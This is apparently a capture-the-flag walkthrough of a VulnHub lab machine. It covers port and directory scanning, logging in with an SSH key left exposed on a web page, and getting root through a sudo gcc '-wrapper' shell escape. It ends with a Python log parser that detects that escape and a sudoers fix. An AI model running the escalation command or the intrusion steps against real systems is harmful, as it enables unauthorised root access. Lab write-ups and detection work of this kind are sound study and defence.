Enumeration and Initial Shell
As usual, I started with nmap to look for open ports and the services running behind them.
┌──(madhav㉿kali)-[~/Documents/vulnhub/nyx]
└─$ nmap -sC -sV -oN nmap/initial 192.168.1.3
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-23 13:08 IST
Nmap scan report for 192.168.1.3
Host is up (0.0021s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|   2048 fc:8b:87:f4:36:cd:7d:0f:d8:f3:16:15:a9:47:f1:0b (RSA)
|   256 b4:5c:08:96:02:c6:a8:0b:01:fd:49:68:dd:aa:fb:3a (ECDSA)
|_  256 cb:bf:22:93:69:76:60:a4:7d:c0:19:f3:c7:15:e7:3c (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: nyx
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.18 seconds
Ports 22 (SSH) and 80 (HTTP) are open. Let's open the browser and check port 80 first.
Next, I performed a gobuster scan to look for hidden files and directories.
┌──(madhav㉿kali)-[~/Documents/vulnhub/nyx]
└─$ gobuster dir -u http://192.168.1.3 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .txt,.php,.html
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://192.168.1.3
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     txt,php,html
[+] Timeout:        10s
===============================================================
2020/09/23 13:09:00 Starting gobuster
===============================================================
/index.html (Status: 200)
/key.php (Status: 200)
/server-status (Status: 403)
===============================================================
2020/09/23 13:12:53 Finished
===============================================================
We can see a page named key.php. After opening it in the browser, I saw that it asks us for a key.
Looking at the page source, I found that the form does not submit the value anywhere, so it is a rabbit hole. Next, I ran Nmap's http-enum script against port 80.
┌──(madhav㉿kali)-[~/Documents/vulnhub/nyx]
└─$ nmap -sC -sV -p 80 --script=http-enum 192.168.1.3
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-23 13:13 IST
Nmap scan report for 192.168.1.3
Host is up (0.00032s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
| http-enum:
|_  /d41d8cd98f00b204e9800998ecf8427e.php: Seagate BlackArmorNAS 110/220/440 Administrator Password Reset Vulnerability
|_http-server-header: Apache/2.4.38 (Debian)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.16 seconds
This reveals another page. The Seagate NAS label is only what http-enum's fingerprint database associates with that file name; what matters here is that the page exists. I opened it in the browser and found an SSH private key.
Looking at the title of the page, we can find a username: mpampis. I copied the key into a file, gave it the correct permissions, and logged in via SSH. After logging in, we can read the user flag.
nano id_rsa
chmod 600 id_rsa
ssh -i id_rsa mpampis@192.168.1.3
To obtain a root shell, I ran sudo -l to see whether this user can run any commands as root.
mpampis@nyx:/$ sudo -l
Matching Defaults entries for mpampis on nyx:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User mpampis may run the following commands on nyx:
    (root) NOPASSWD: /usr/bin/gcc
We can run gcc as root without a password. I looked gcc up on GTFOBins and found that a root shell can be obtained with this single command, because gcc's -wrapper option runs an arbitrary program around each compiler subprocess:
sudo gcc -wrapper /bin/sh,-s .
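From the defender's side, this escape leaves a clear trace: sudo logs every command it runs to auth.log, and the gcc invocation above carries "-wrapper" followed by a shell. The following detection is an added example written for this walkthrough, not code from the original post; the log lines are constructed in the format sudo writes to syslog, and the first of them mirrors the command shown above.

```python
import re

# Constructed sample of auth.log entries (syslog format sudo uses).
# Line 1 is the gcc -wrapper escape from the walkthrough; line 2 is a
# legitimate compile as root; line 3 is unrelated sshd noise.
SAMPLE_AUTH_LOG = """\
Sep 23 13:20:01 nyx sudo:  mpampis : TTY=pts/0 ; PWD=/ ; USER=root ; COMMAND=/usr/bin/gcc -wrapper /bin/sh,-s .
Sep 23 13:21:10 nyx sudo:  mpampis : TTY=pts/0 ; PWD=/home/mpampis ; USER=root ; COMMAND=/usr/bin/gcc -o hello hello.c
Sep 23 13:22:30 nyx sshd[812]: Accepted publickey for mpampis from 192.168.1.5 port 50122 ssh2
"""

# Fields sudo writes for each command it executes.
SUDO_RE = re.compile(
    r"sudo:\s+(?P<user>\S+) : TTY=(?P<tty>\S+) ; PWD=(?P<pwd>\S+) ; "
    r"USER=(?P<runas>\S+) ; COMMAND=(?P<cmd>.*)$"
)
COMPILERS = {"gcc", "cc", "g++"}
SHELLS = {"sh", "bash", "dash", "zsh"}


def wrapper_target(argv):
    """Return the program named by gcc's -wrapper option, or None.

    gcc takes the option as '-wrapper prog,arg1,arg2'; the program is
    the first comma-separated element of the following argument.
    """
    for i, arg in enumerate(argv):
        if arg == "-wrapper" and i + 1 < len(argv):
            return argv[i + 1].split(",")[0]
    return None


def is_compiler_shell_escape(cmd: str) -> bool:
    """True when a compiler is told to wrap its subprocesses in a shell."""
    argv = cmd.split()
    if not argv or argv[0].rsplit("/", 1)[-1] not in COMPILERS:
        return False
    target = wrapper_target(argv)
    return target is not None and target.rsplit("/", 1)[-1] in SHELLS


def find_sudo_escapes(log_text: str):
    """Return (user, runas, command) for every sudo line that is an escape."""
    hits = []
    for line in log_text.splitlines():
        m = SUDO_RE.search(line)
        if m and is_compiler_shell_escape(m.group("cmd")):
            hits.append((m.group("user"), m.group("runas"), m.group("cmd")))
    return hits
```

Detection is the fallback; the fix is to drop the NOPASSWD gcc rule from sudoers, since any rule that lets a user run a compiler as root is equivalent to granting a root shell.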
That’s it! Thanks for reading. Stay tuned for similar walkthroughs and much more coming up in the near future!
NOTE: The awesome artwork used in this article was created by Evgeny Polukhin.